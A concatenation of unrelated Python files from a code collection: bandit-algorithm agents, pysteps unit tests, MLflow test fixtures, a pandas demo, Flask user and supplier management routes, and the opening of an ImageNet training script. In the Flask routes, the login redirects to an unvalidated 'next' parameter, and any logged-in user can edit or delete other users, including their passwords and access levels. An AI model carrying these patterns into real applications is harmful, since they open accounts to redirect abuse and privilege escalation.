class EpsilonGreedyAgent(Agent):
def __init__(self):
super().__init__()
self.epsilon = None
def agent_init(self, agent_info=None):
if agent_info is None:
agent_info = {}
super().agent_init(agent_info)
self.epsilon = agent_info.get("epsilon", 0.1)
def agent_step(self, reward, observation):
"""
Takes one step for the agent. It takes in a reward and observation and
returns the action the agent chooses at that time step.
Arguments:
reward -- float, the reward the agent received from the environment after taking the last action.
observation -- float, the observed state the agent is in. Do not worry about this as you will not use it
until future lessons
Returns:
current_action -- int, the action chosen by the agent at the current time step.
"""
a = self.last_action
self.arm_count[a] += 1
self.q_values_oracle[a] = self.q_values_oracle[a] + 1 / self.arm_count[a] * (reward - self.q_values_oracle[a])
if np.sum(self.arm_count) % self.batch_size == 0:
self.q_values = self.q_values_oracle.copy()
if np.random.random() < self.epsilon:
current_action = np.random.choice(range(len(self.arm_count)))
else:
current_action = argmax(self.q_values)
self.last_action = current_action
return current_action
class UCBAgent(Agent):
def __init__(self):
super().__init__()
self.upper_bounds = None
self.alpha = None # exploration parameter
def agent_init(self, agent_info=None):
if agent_info is None:
agent_info = {}
super().agent_init(agent_info)
self.alpha = agent_info.get("alpha", 1.0)
self.arm_count = np.ones(self.num_actions)
self.upper_bounds = np.sqrt(np.log(np.sum(self.arm_count)) / self.arm_count)
def agent_step(self, reward, observation):
a = self.last_action
self.arm_count[a] += 1
self.q_values_oracle[a] = self.q_values_oracle[a] + 1 / self.arm_count[a] * (reward - self.q_values_oracle[a])
# since we start with arms_count = np.ones(num_actions),
# we should subtract num_actions to get number of the current round
if (np.sum(self.arm_count) - self.num_actions) % self.batch_size == 0:
self.q_values = self.q_values_oracle.copy()
self.upper_bounds = np.sqrt(np.log(np.sum(self.arm_count)) / self.arm_count)
# if min(self.q_values + self.alpha * self.upper_bounds) < max(self.q_values):
# print(f'Distinguish suboptimal arm at step {sum(self.arm_count)}')
current_action = argmax(self.q_values + self.alpha * self.upper_bounds)
# current_action = np.argmax(self.q_values + self.alpha * self.upper_bounds)
self.last_action = current_action
return current_action
class TSAgent(Agent):
def agent_step(self, reward, observation):
a = self.last_action
self.arm_count[a] += 1
self.q_values_oracle[a] = self.q_values_oracle[a] + 1 / self.arm_count[a] * (reward - self.q_values_oracle[a])
if (np.sum(self.arm_count) - self.num_actions) % self.batch_size == 0:
self.q_values = self.q_values_oracle.copy()
# sample from posteriors
theta = [beta.rvs(a + 1, b + 1, size=1) for a, b in
zip(self.q_values * self.arm_count, self.arm_count - self.q_values * self.arm_count)]
# choose the max realization
current_action = argmax(theta)
self.last_action = current_action
return current_action
|
py | b41505786aae7f1676229a0e50f7aa20725b09af | # -*- coding: utf-8 -*-
import datetime as dt
import numpy as np
import pytest
from numpy.testing import assert_array_equal, assert_array_almost_equal
from pytest import raises
from pysteps.utils import arrays, conversion, dimension, transformation, aggregate_fields
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# arrays
# compute_centred_coord_array
test_data = [
(2, 2, [np.array([[-1, 0]]).T, np.array([[-1, 0]])]),
(3, 3, [np.array([[-1, 0, 1]]).T, np.array([[-1, 0, 1]])]),
(3, 2, [np.array([[-1, 0, 1]]).T, np.array([[-1, 0]])]),
(2, 3, [np.array([[-1, 0]]).T, np.array([[-1, 0, 1]])]),
]
@pytest.mark.parametrize("M, N, expected", test_data)
def test_compute_centred_coord_array(M, N, expected):
"""Test the compute_centred_coord_array."""
assert_array_equal(arrays.compute_centred_coord_array(M, N)[0], expected[0])
assert_array_equal(arrays.compute_centred_coord_array(M, N)[1], expected[1])
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# conversion
# to_rainrate
test_data = [
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([1]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([12]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([1.25892541]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([15.10710494]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "dBZ",
"threshold": 0,
"zerovalue": 0,
},
np.array([0.04210719]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "log",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([2.71828183]),
),
(
np.array([1.0]),
{
"accutime": 5,
"transform": "log",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([32.61938194]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([1]),
),
(
np.array([1.0]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([12.0]),
),
]
@pytest.mark.parametrize("R, metadata, expected", test_data)
def test_to_rainrate(R, metadata, expected):
"""Test the to_rainrate."""
assert_array_almost_equal(conversion.to_rainrate(R, metadata)[0], expected)
# to_raindepth
test_data = [
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([0.08333333]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([1]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([0.10491045]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([1.25892541]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "dBZ",
"threshold": 0,
"zerovalue": 0,
},
np.array([0.00350893]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "log",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([0.22652349]),
),
(
np.array([1.0]),
{
"accutime": 5,
"transform": "log",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([2.71828183]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([0.08333333]),
),
(
np.array([1.0]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([1.0]),
),
]
@pytest.mark.parametrize("R, metadata, expected", test_data)
def test_to_raindepth(R, metadata, expected):
"""Test the to_raindepth."""
assert_array_almost_equal(conversion.to_raindepth(R, metadata)[0], expected)
# to_reflectivity
test_data = [
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([23.01029996]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([40.27719989]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([24.61029996]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([41.87719989]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "dBZ",
"threshold": 0,
"zerovalue": 0,
},
np.array([1]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "log",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([29.95901167]),
),
(
np.array([1.0]),
{
"accutime": 5,
"transform": "log",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([47.2259116]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([23.01029996]),
),
(
np.array([1.0]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([40.27719989]),
),
]
@pytest.mark.parametrize("R, metadata, expected", test_data)
def test_to_reflectivity(R, metadata, expected):
"""Test the to_reflectivity."""
assert_array_almost_equal(conversion.to_reflectivity(R, metadata)[0], expected)
test_data_not_trim = (
# "data, window_size, axis, method, expected"
(
np.arange(6),
2,
0,
"mean",
np.array([0.5, 2.5, 4.5])
),
(
np.arange(4 * 6).reshape(4, 6),
(2, 3),
(0, 1),
"sum",
np.array([[24, 42], [96, 114]])
),
(
np.arange(4 * 6).reshape(4, 6),
(2, 2),
(0, 1),
"sum",
np.array([[14, 22, 30], [62, 70, 78]])
),
(
np.arange(4 * 6).reshape(4, 6),
2,
(0, 1),
"sum",
np.array([[14, 22, 30], [62, 70, 78]])
),
(
np.arange(4 * 6).reshape(4, 6),
(2, 3),
(0, 1),
"mean",
np.array([[4., 7.], [16., 19.]]),
),
(
np.arange(4 * 6).reshape(4, 6),
(2, 2),
(0, 1),
"mean",
np.array([[3.5, 5.5, 7.5], [15.5, 17.5, 19.5]])
),
(
np.arange(4 * 6).reshape(4, 6),
2,
(0, 1),
"mean",
np.array([[3.5, 5.5, 7.5], [15.5, 17.5, 19.5]])
),
)
@pytest.mark.parametrize(
"data, window_size, axis, method, expected", test_data_not_trim
)
def test_aggregate_fields(data, window_size, axis, method, expected):
"""
Test the aggregate_fields function.
The windows size must divide exactly the data dimensions.
Internally, additional test are generated for situations where the
windows size does not divide the data dimensions.
The length of each dimension should be larger than 2.
"""
assert_array_equal(
aggregate_fields(data, window_size, axis=axis, method=method),
expected,
)
# Test the trimming capabilities.
data = np.pad(data, (0, 1))
assert_array_equal(
aggregate_fields(data,
window_size,
axis=axis,
method=method,
trim=True),
expected,
)
with raises(ValueError):
aggregate_fields(data,
window_size,
axis=axis,
method=method)
def test_aggregate_fields_errors():
"""
Test that the errors are correctly captured in the aggregate_fields
function.
"""
data = np.arange(4 * 6).reshape(4, 6)
with raises(ValueError):
aggregate_fields(data, -1, axis=0)
with raises(ValueError):
aggregate_fields(data, 0, axis=0)
with raises(ValueError):
aggregate_fields(data, 1, method="invalid")
with raises(TypeError):
aggregate_fields(data, (1, 1), axis=0)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# dimension
# aggregate_fields_time
timestamps = [dt.datetime.now() + dt.timedelta(minutes=t) for t in range(10)]
test_data = [
(
np.ones((10, 1, 1)),
{"unit": "mm/h", "timestamps": timestamps},
2,
False,
np.ones((5, 1, 1)),
),
(
np.ones((10, 1, 1)),
{"unit": "mm", "timestamps": timestamps},
2,
False,
2 * np.ones((5, 1, 1)),
),
]
@pytest.mark.parametrize(
"R, metadata, time_window_min, ignore_nan, expected", test_data
)
def test_aggregate_fields_time(R, metadata, time_window_min, ignore_nan, expected):
"""Test the aggregate_fields_time."""
assert_array_equal(
dimension.aggregate_fields_time(R, metadata, time_window_min, ignore_nan)[0],
expected,
)
# aggregate_fields_space
test_data = [
(
np.ones((1, 10, 10)),
{"unit": "mm/h", "xpixelsize": 1, "ypixelsize": 1},
2,
False,
np.ones((1, 5, 5)),
),
(
np.ones((1, 10, 10)),
{"unit": "mm", "xpixelsize": 1, "ypixelsize": 1},
2,
False,
4 * np.ones((1, 5, 5)),
),
]
@pytest.mark.parametrize("R, metadata, space_window, ignore_nan, expected", test_data)
def test_aggregate_fields_space(R, metadata, space_window, ignore_nan, expected):
"""Test the aggregate_fields_space."""
assert_array_equal(
dimension.aggregate_fields_space(R, metadata, space_window, ignore_nan)[0],
expected,
)
# clip_domain
R = np.zeros((4, 4))
R[:2, :] = 1
test_data = [
(
R,
{
"x1": 0,
"x2": 4,
"y1": 0,
"y2": 4,
"xpixelsize": 1,
"ypixelsize": 1,
"zerovalue": 0,
"yorigin": "upper",
},
None,
R,
),
(
R,
{
"x1": 0,
"x2": 4,
"y1": 0,
"y2": 4,
"xpixelsize": 1,
"ypixelsize": 1,
"zerovalue": 0,
"yorigin": "lower",
},
(2, 4, 2, 4),
np.zeros((2, 2)),
),
(
R,
{
"x1": 0,
"x2": 4,
"y1": 0,
"y2": 4,
"xpixelsize": 1,
"ypixelsize": 1,
"zerovalue": 0,
"yorigin": "upper",
},
(2, 4, 2, 4),
np.ones((2, 2)),
),
]
@pytest.mark.parametrize("R, metadata, extent, expected", test_data)
def test_clip_domain(R, metadata, extent, expected):
"""Test the clip_domain."""
assert_array_equal(dimension.clip_domain(R, metadata, extent)[0], expected)
# square_domain
R = np.zeros((4, 2))
test_data = [
# square by padding
(
R,
{"x1": 0, "x2": 2, "y1": 0, "y2": 4, "xpixelsize": 1, "ypixelsize": 1},
"pad",
False,
np.zeros((4, 4)),
),
# square by cropping
(
R,
{"x1": 0, "x2": 2, "y1": 0, "y2": 4, "xpixelsize": 1, "ypixelsize": 1},
"crop",
False,
np.zeros((2, 2)),
),
# inverse square by padding
(
np.zeros((4, 4)),
{
"x1": -1,
"x2": 3,
"y1": 0,
"y2": 4,
"xpixelsize": 1,
"ypixelsize": 1,
"orig_domain": (4, 2),
"square_method": "pad",
},
"pad",
True,
R,
),
# inverse square by cropping
(
np.zeros((2, 2)),
{
"x1": 0,
"x2": 2,
"y1": 1,
"y2": 3,
"xpixelsize": 1,
"ypixelsize": 1,
"orig_domain": (4, 2),
"square_method": "crop",
},
"crop",
True,
R,
),
]
@pytest.mark.parametrize("R, metadata, method, inverse, expected", test_data)
def test_square_domain(R, metadata, method, inverse, expected):
"""Test the square_domain."""
assert_array_equal(
dimension.square_domain(R, metadata, method, inverse)[0], expected
)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# transformation
# boxcox_transform
test_data = [
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
None,
None,
None,
False,
np.array([0]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "BoxCox",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
None,
None,
None,
True,
np.array([np.exp(1)]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
1.0,
None,
None,
False,
np.array([0]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "BoxCox",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
1.0,
None,
None,
True,
np.array([2.0]),
),
]
@pytest.mark.parametrize(
"R, metadata, Lambda, threshold, zerovalue, inverse, expected", test_data
)
def test_boxcox_transform(R, metadata, Lambda, threshold, zerovalue, inverse, expected):
"""Test the boxcox_transform."""
assert_array_almost_equal(
transformation.boxcox_transform(
R, metadata, Lambda, threshold, zerovalue, inverse
)[0],
expected,
)
# dB_transform
test_data = [
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
None,
None,
False,
np.array([0]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
None,
None,
True,
np.array([1.25892541]),
),
]
@pytest.mark.parametrize(
"R, metadata, threshold, zerovalue, inverse, expected", test_data
)
def test_dB_transform(R, metadata, threshold, zerovalue, inverse, expected):
"""Test the dB_transform."""
assert_array_almost_equal(
transformation.dB_transform(R, metadata, threshold, zerovalue, inverse)[0],
expected,
)
# NQ_transform
test_data = [
(
np.array([1, 2]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
False,
np.array([-0.4307273, 0.4307273]),
)
]
@pytest.mark.parametrize("R, metadata, inverse, expected", test_data)
def test_NQ_transform(R, metadata, inverse, expected):
"""Test the NQ_transform."""
assert_array_almost_equal(
transformation.NQ_transform(R, metadata, inverse)[0], expected
)
# sqrt_transform
test_data = [
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
False,
np.array([1]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
True,
np.array([1]),
),
]
@pytest.mark.parametrize("R, metadata, inverse, expected", test_data)
def test_sqrt_transform(R, metadata, inverse, expected):
"""Test the sqrt_transform."""
assert_array_almost_equal(
transformation.sqrt_transform(R, metadata, inverse)[0], expected
)
|
py | b41506c3894ab4982c8048a88e30451b577bae2a | """ Endpoint Callback Handlers """
import logging as log
import uuid
import json
from . import model
def greeter(name):
"""Greeter route callback"""
return f"Hello {name}!"
# def save_user(user, user_id=""):
# """Save User route callback"""
# if user_id == "":
# user_id = str(uuid.uuid4())
# log.info("Saving USER_ID: %s", user_id)
# user = json.dumps(user)
# return model.save_user(user, user_id)
def reserve(json_body):
"""Save reservation callback"""
return model.save_reservation(json_body)
def get_reservations(flight_id):
"""Get reservations callback"""
return model.get_reservations(flight_id)
|
py | b41506d24e2e306036dd0f162931e30ce50791bc | import os
import inspect
from unittest import mock
import pytest
import mlflow
from mlflow.utils.file_utils import path_to_local_sqlite_uri
from tests.autologging.fixtures import test_mode_on
@pytest.fixture
def reset_mock():
cache = []
def set_mock(obj, attr, mock):
cache.append((obj, attr, getattr(obj, attr)))
setattr(obj, attr, mock)
yield set_mock
for obj, attr, value in cache:
setattr(obj, attr, value)
cache[:] = []
@pytest.fixture(autouse=True)
def tracking_uri_mock(tmpdir, request):
try:
if "notrackingurimock" not in request.keywords:
tracking_uri = path_to_local_sqlite_uri(os.path.join(tmpdir.strpath, "mlruns"))
mlflow.set_tracking_uri(tracking_uri)
os.environ["MLFLOW_TRACKING_URI"] = tracking_uri
yield tmpdir
finally:
mlflow.set_tracking_uri(None)
if "notrackingurimock" not in request.keywords:
del os.environ["MLFLOW_TRACKING_URI"]
@pytest.fixture(autouse=True, scope="session")
def enable_test_mode_by_default_for_autologging_integrations():
"""
Run all MLflow tests in autologging test mode, ensuring that errors in autologging patch code
are raised and detected. For more information about autologging test mode, see the docstring
for :py:func:`mlflow.utils.autologging_utils._is_testing()`.
"""
yield from test_mode_on()
@pytest.fixture(autouse=True)
def clean_up_leaked_runs():
"""
Certain test cases validate safety API behavior when runs are leaked. Leaked runs that
are not cleaned up between test cases may result in cascading failures that are hard to
debug. Accordingly, this fixture attempts to end any active runs it encounters and
throws an exception (which reported as an additional error in the pytest execution output).
"""
try:
yield
assert (
not mlflow.active_run()
), "test case unexpectedly leaked a run. Run info: {}. Run data: {}".format(
mlflow.active_run().info, mlflow.active_run().data
)
finally:
while mlflow.active_run():
mlflow.end_run()
def _called_in_save_model():
for frame in inspect.stack()[::-1]:
if frame.function == "save_model":
return True
return False
@pytest.fixture(autouse=True)
def prevent_infer_pip_requirements_fallback(request):
"""
Prevents `mlflow.models.infer_pip_requirements` from falling back in `mlflow.*.save_model`
unless explicitly disabled via `pytest.mark.disable_prevent_infer_pip_requirements_fallback`.
"""
from mlflow.utils.environment import _INFER_PIP_REQUIREMENTS_FALLBACK_MESSAGE
def new_exception(msg, *_, **__):
if msg == _INFER_PIP_REQUIREMENTS_FALLBACK_MESSAGE and _called_in_save_model():
raise Exception(
"`mlflow.models.infer_pip_requirements` should not fall back in"
"`mlflow.*.save_model` during test"
)
if "disable_prevent_infer_pip_requirements_fallback" not in request.keywords:
with mock.patch("mlflow.utils.environment._logger.exception", new=new_exception):
yield
else:
yield
|
py | b41506eae9852aa856410c351ce99db45d2417f9 | import pandas
yillar = [2015, 2016, 2017, 2018]
gelirler = [500, 600, 700, 800]
x = pandas.Series(data=gelirler, index=yillar)
print(x)
print(x.sum())
print(x.max())
print(x.mean())
print(x.median())
print(x.var())
print(x.std())
print(x.describe())
|
py | b4150716a0e379162383f75043233aa5f2cd27a9 | # IMPORTS
from flask import render_template, url_for, flash, redirect, request
from flask_login import login_user, logout_user, current_user, login_required
from project import app, db, bcrypt
from project.forms import loginForm, createUserForm, editUserForm, createSupplierForm, editSupplierForm
from project.models import users, suppliers
from project.tables import userList, supplierList
# MAIN ROUTES
@app.route("/home")
@login_required
def home():
return render_template('home.html', title='Home')
@app.route("/", methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = loginForm()
if form.validate_on_submit():
user = users.query.filter_by(id=form.userID.data).first()
if user and bcrypt.check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
next_page = request.args.get('next')
return redirect(next_page) if next_page else redirect(url_for('home'))
else:
flash('Incorrect Details')
return render_template('login.html', title='Login', form=form)
@app.route("/logout")
@login_required
def logout():
logout_user()
return redirect(url_for('login'))
# USER ROUTES
@app.route("/displayUsers")
@login_required
def displayUsers():
table = userList(users.query.all())
return render_template('user/displayUsers.html', title='Users', table=table)
@app.route("/displayUsers/createUser", methods=['GET', 'POST'])
@login_required
def createUser():
form = createUserForm()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user = users(
name = form.name.data,
address = form.address.data,
email = form.email.data,
phone = form.phone.data,
area = form.area.data,
password = hashed_password,
access = form.access.data
)
db.session.add(user)
db.session.commit()
flash(f'- Created User ({user.name})')
return redirect(url_for('displayUsers'))
return render_template('user/createUser.html', title='Create User', form=form)
@app.route('/displayUsers/editUser/<int:id>', methods=['GET', 'POST'])
@login_required
def editUser(id):
form = editUserForm()
find = db.session.query(users).filter(users.id==id)
user = find.first()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user.name = form.name.data
user.address = form.address.data
user.email = form.email.data
user.phone = form.phone.data
user.area = form.area.data
user.password = hashed_password
user.access = form.access.data
db.session.commit()
flash(f'- Updated User ({user.name})')
return redirect(url_for('displayUsers'))
elif request.method == 'GET':
form.name.data = user.name
form.address.data = user.address
form.email.data = user.email
form.phone.data = user.phone
form.area.data = user.area
form.access.data = user.access
return render_template('user/editUser.html', title='Edit User',form=form)
@app.route('/displayUsers/removeUser/<int:id>', methods=['GET', 'POST'])
@login_required
def removeUser(id):
find = db.session.query(users).filter(users.id==id)
user = find.first()
if user and user != current_user:
flash(f'- Removed User ({user.name})')
db.session.delete(user)
db.session.commit()
return redirect(url_for('displayUsers'))
# SUPPLIER ROUTES
@app.route("/displaySuppliers")
@login_required
def displaySuppliers():
table = supplierList(suppliers.query.all())
return render_template('supplier/displaySuppliers.html', title='Suppliers', table=table)
@app.route("/displaySuppliers/createSupplier", methods=['GET', 'POST'])
@login_required
def createSupplier():
form = createSupplierForm()
if form.validate_on_submit():
supplier = suppliers(
name = form.name.data,
address = form.address.data,
email1 = form.email1.data,
email2 = form.email2.data,
email3 = form.email3.data,
phone = form.phone.data,
type = form.type.data
)
db.session.add(supplier)
db.session.commit()
flash(f'- Created Supplier ({supplier.name})')
return redirect(url_for('displaySuppliers'))
return render_template('supplier/createSupplier.html', title='Create Supplier', form=form)
@app.route('/displaySuppliers/editSupplier/<int:id>', methods=['GET', 'POST'])
@login_required
def editSupplier(id):
form = editSupplierForm()
find = db.session.query(suppliers).filter(suppliers.id==id)
supplier = find.first()
if form.validate_on_submit():
supplier.name = form.name.data
supplier.address = form.address.data
supplier.email1 = form.email1.data
supplier.email2 = form.email2.data
supplier.email3 = form.email3.data
supplier.phone = form.phone.data
supplier.type = form.type.data
db.session.commit()
flash(f'- Updated Supplier ({supplier.name})')
return redirect(url_for('displaySuppliers'))
elif request.method == 'GET':
form.name.data = supplier.name
form.address.data = supplier.address
form.email1.data = supplier.email1
form.email2.data = supplier.email2
form.email3.data = supplier.email3
form.phone.data = supplier.phone
form.type.data = supplier.type
return render_template('supplier/editSupplier.html', title='Edit Supplier',form=form)
@app.route('/displaySuppliers/removeSupplier/<int:id>', methods=['GET', 'POST'])
@login_required
def removeSupplier(id):
find = db.session.query(suppliers).filter(suppliers.id==id)
supplier = find.first()
if supplier:
flash(f'- Removed Supplier ({supplier.name})')
db.session.delete(supplier)
db.session.commit()
return redirect(url_for('displaySuppliers'))
|
py | b415074a4f80d7f57b088cbea441c364137bf992 | '''
Training script for ImageNet
Copyright (c) Wei YANG, 2017
'''
from __future__ import print_function
import argparse
import os
import random
import shutil
import time
import warnings
import torch
from torch.fx.graph_module import GraphModule
import torch.nn as nn
from torch.nn.modules import module
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.optim
from torch.serialization import save
import torch.utils.data
import torch.utils.data.distributed
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
import models.imagenet as customized_models
from utils import Bar, Logger, AverageMeter, accuracy, mkdir_p, savefig
from utils.dataloaders import *
from tensorboardX import SummaryWriter
#! add by dongz
import torch.fx
from qnq_src.qnq import *
from PIL import Image, ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
default_model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
customized_models_names = sorted(
name for name in customized_models.__dict__
if name.islower() and not name.startswith("__")
and callable(customized_models.__dict__[name]))
for name in customized_models.__dict__:
if name.islower() and not name.startswith("__") and callable(
customized_models.__dict__[name]):
models.__dict__[name] = customized_models.__dict__[name]
model_names = default_model_names + customized_models_names
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
parser.add_argument('-d', '--data', metavar='DIR', help='path to dataset')
parser.add_argument('--data-backend',
metavar='BACKEND',
default='pytorch',
choices=DATA_BACKEND_CHOICES)
parser.add_argument('-a',
'--arch',
metavar='ARCH',
default='resnet18',
choices=model_names,
help='model architecture: ' + ' | '.join(model_names) +
' (default: resnet18)')
parser.add_argument('-j',
'--workers',
default=4,
type=int,
metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--epochs',
default=90,
type=int,
metavar='N',
help='number of total epochs to run')
parser.add_argument('--start-epoch',
default=0,
type=int,
metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument(
'-b',
'--batch-size',
default=256,
# default=64,
type=int,
metavar='N',
help='mini-batch size (default: 256), this is the total '
'batch size of all GPUs on the current node when '
'using Data Parallel or Distributed Data Parallel')
parser.add_argument('--lr',
'--learning-rate',
default=0.1,
type=float,
metavar='LR',
help='initial learning rate',
dest='lr')
parser.add_argument('--momentum',
default=0.9,
type=float,
metavar='M',
help='momentum')
parser.add_argument('--wd',
'--weight-decay',
default=1e-4,
type=float,
metavar='W',
help='weight decay (default: 1e-4)',
dest='weight_decay')
parser.add_argument('-p',
'--print-freq',
default=10,
type=int,
metavar='N',
help='print frequency (default: 10)')
parser.add_argument('--resume',
default='',
type=str,
metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('-e',
'--evaluate',
dest='evaluate',
action='store_true',
help='evaluate model on validation set')
parser.add_argument('--pretrained',
dest='pretrained',
action='store_true',
help='use pre-trained model')
parser.add_argument('--world-size',
default=-1,
type=int,
help='number of nodes for distributed training')
parser.add_argument('--rank',
default=-1,
type=int,
help='node rank for distributed training')
parser.add_argument('--dist-url',
default='tcp://224.66.41.62:23456',
type=str,
help='url used to set up distributed training')
parser.add_argument('--dist-backend',
default='nccl',
type=str,
help='distributed backend')
parser.add_argument('--seed',
default=None,
type=int,
help='seed for initializing training. ')
parser.add_argument('--lr-decay',
type=str,
default='step',
help='mode for learning rate decay')
parser.add_argument('--step',
type=int,
default=30,
help='interval for learning rate decay in step mode')
parser.add_argument('--schedule',
type=int,
nargs='+',
default=[150, 225],
help='decrease learning rate at these epochs.')
parser.add_argument('--gamma',
type=float,
default=0.1,
help='LR is multiplied by gamma on schedule.')
parser.add_argument(
'--warmup',
action='store_true',
help='set lower initial learning rate to warm up the training')
parser.add_argument('-c',
'--checkpoint',
default='checkpoints',
type=str,
metavar='PATH',
help='path to save checkpoint (default: checkpoints)')
parser.add_argument('--width-mult',
type=float,
default=1.0,
help='MobileNet model width multiplier.')
parser.add_argument('--input-size',
type=int,
default=224,
help='MobileNet model input resolution')
parser.add_argument('--weight',
default='',
type=str,
metavar='WEIGHT',
help='path to pretrained weight (default: none)')
best_prec1 = 0
def main():
#! add by dongz
global val_loader
global val_loader_len
global model
global criterion
global dict_t
dict_t = {-1: 300, 20: 600, 50: 1000, 100: 2000}
# dict_t = {-1: 200, 5: 260, 10: 300, 20: 600, 30: 1000, 50: 2000, 100: 3000}
global args, best_prec1
args = parser.parse_args()
if args.seed is not None:
random.seed(args.seed)
torch.manual_seed(args.seed)
cudnn.deterministic = True
warnings.warn('You have chosen to seed training. '
'This will turn on the CUDNN deterministic setting, '
'which can slow down your training considerably! '
'You may see unexpected behavior when restarting '
'from checkpoints.')
args.distributed = args.world_size > 1
if args.distributed:
dist.init_process_group(backend=args.dist_backend,
init_method=args.dist_url,
world_size=args.world_size)
# create model
print("=> creating model '{}'".format(args.arch))
model = models.__dict__[args.arch](width_mult=args.width_mult)
if not args.distributed:
if args.arch.startswith('alexnet') or args.arch.startswith('vgg'):
model.features = torch.nn.DataParallel(model.features)
model.cuda()
else:
#!ori
model = torch.nn.DataParallel(model).cuda()
model = model.cuda()
else:
model.cuda()
model = torch.nn.parallel.DistributedDataParallel(model)
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.SGD(model.parameters(),
args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
#! first use of checkpoint, edit by dongz
dongz_logger, args.checkpoint = lognow(save_path="./expriment/")
dongz_logger.info(str(dict_t))
# optionally resume from a checkpoint
title = 'ImageNet-' + args.arch
if not os.path.isdir(args.checkpoint):
mkdir_p(args.checkpoint)
# if args.resume:
# if os.path.isfile(args.resume):
# print("=> loading checkpoint '{}'".format(args.resume))
# checkpoint = torch.load(args.resume)
